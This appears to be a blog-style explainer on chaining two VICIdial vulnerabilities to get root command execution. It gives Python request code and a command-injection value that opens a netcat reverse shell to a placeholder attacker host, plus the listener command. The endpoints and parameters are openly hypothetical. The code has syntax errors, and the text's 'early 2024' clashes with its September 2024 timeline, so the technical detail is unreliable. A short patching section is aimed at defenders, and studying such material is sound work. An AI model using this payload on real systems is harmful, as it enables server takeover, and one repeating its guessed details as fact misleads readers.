CVE-2024-8504 - From Agent to Root—How Attackers Exploit VICIdial for Root Shell Access

VICIdial, the open-source call center suite, is trusted by thousands for handling high-volume calls. But in early 2024, two serious vulnerabilities—CVE-2024-8503 and CVE-2024-8504—were reported, revealing a shocking privilege escalation path. By chaining these, an unauthenticated attacker can eventually run commands as root on the underlying server.

This deep dive will show you (in plain English) how an attacker can abuse these weaknesses, with examples and key takeaways for defenders.

What is CVE-2024-8504?

CVE-2024-8504 affects VICIdial through its agent interface. Anyone logged in as an “agent” can abuse backend scripts to run any shell command as root. This allows mischief from data theft to complete system takeover.

CVE-2024-8504 Official Reference

- NVD Entry for CVE-2024-8504
- VICIdial Project

The Attack Chain: CVE-2024-8503 + CVE-2024-8504

CVE-2024-8503 lets attackers become an agent with zero authentication. Combine it with CVE-2024-8504 and they get root-level access in seconds.

Get In as an Agent

CVE-2024-8503 allows open registration or session hijacking. The attacker creates or steals an agent session.

Send a Malicious Command

Using the agent interface, the attacker abuses a vulnerable parameter that VICIdial scripts pass directly to ‘system()’ or similar root-level calls.

Step 1: Acquire Agent Access (Via CVE-2024-8503)

Suppose there’s an endpoint like /agc/vicidial.php?session=abc123 and it fails to check auth properly.

import requests

# Log in as agent (unauthenticated, thanks to CVE-2024-8503)
session = requests.Session()
payload = {
    'user': '1001',
    'pass': 'any_password',  # Or even blank, depending on config
}
r = session.post('http://victim/vicidial/agc/vicidial.php';, data=payload)

Step 2: Trigger the Vulnerable Parameter (CVE-2024-8504)

VICIdial passes certain agent-supplied input to a privileged system script like AST_VDremote_agents.pl or vicidial_agent using shell commands.

Imagine a POST request allows setting a phone number or custom field, and the server command includes:

# Vulnerable VICIdial code (simplified)
my $phone = param('phone');
system("vicidial_some_command --phone='$phone'");

An attacker can inject shell characters

# Malicious phone number for code injection
exploit_phone = "12345; nc -e /bin/bash attacker.ip 4444 #"

data = {
    'phone': exploit_phone,
    # plus any other required agent params
}
r = session.post('http://victim/vicidial/agent_api.php';, data=data)

Result: The server runs nc -e /bin/bash attacker.ip 4444 as root, spawning a reverse shell.

On the attacker's machine

nc -lvnp 4444
# Wait for root shell to connect in!

Runs as root: Any command can be executed, from installing backdoors to erasing files.

- Hard to detect: Attack can happen inside seemingly “normal” agent actions, blending into call center logs.

How to Fix and Defend

1. Patch Immediately: Upgrade VICIdial to the latest fixed version. See official changelog.
2. Sanitize All Inputs: Don’t pass user input to shell commands. Use parameterized calls or direct system APIs where possible.

Resources

- CVE-2024-8503 at NVD
- CVE-2024-8504 at NVD
- VICIdial Official Website
- OS Command Injection (OWASP)

Conclusion

CVE-2024-8504 is a textbook example of why input validation and privilege separation are crucial. When chained with CVE-2024-8503, even a call center employee—or anyone on the web—can own your server as root in just a few POST requests.

If you’re running VICIdial, patch now, review your configs, and keep security at the front of your operations.

Timeline

Published on: 09/10/2024 20:15:05 UTC
Last modified on: 09/12/2024 14:35:23 UTC